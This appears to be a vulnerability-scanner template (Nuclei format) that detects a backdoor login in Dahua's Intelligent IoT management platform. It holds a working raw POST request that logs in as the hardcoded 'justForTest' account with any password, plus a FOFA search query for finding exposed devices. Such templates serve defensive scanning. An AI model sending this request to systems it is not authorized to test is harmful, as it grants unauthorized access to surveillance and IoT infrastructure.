id: dahua-icc-backdoor-user

info:
  name: Dahua Intelligent IoT - Information Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-1935899595"body="*客户端会小于800*"
  tags: dahua,exposure,backdoor,bypass

http:
  - raw:
      - |
        POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":'
          - '"access_token":'
          - '"token_type":'
          - 'magicId'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
# digest: 4a0a0047304502202f66ac6a8c54de587e6e21482a082175a7931ae59dfa8ac2e63bf405ddcfe870022100a19620245a5e1eb6c6390359e3735bfff8a966f72dd07da246133ccf02ce03e5:922c64590222798bb761d5b6d8e72950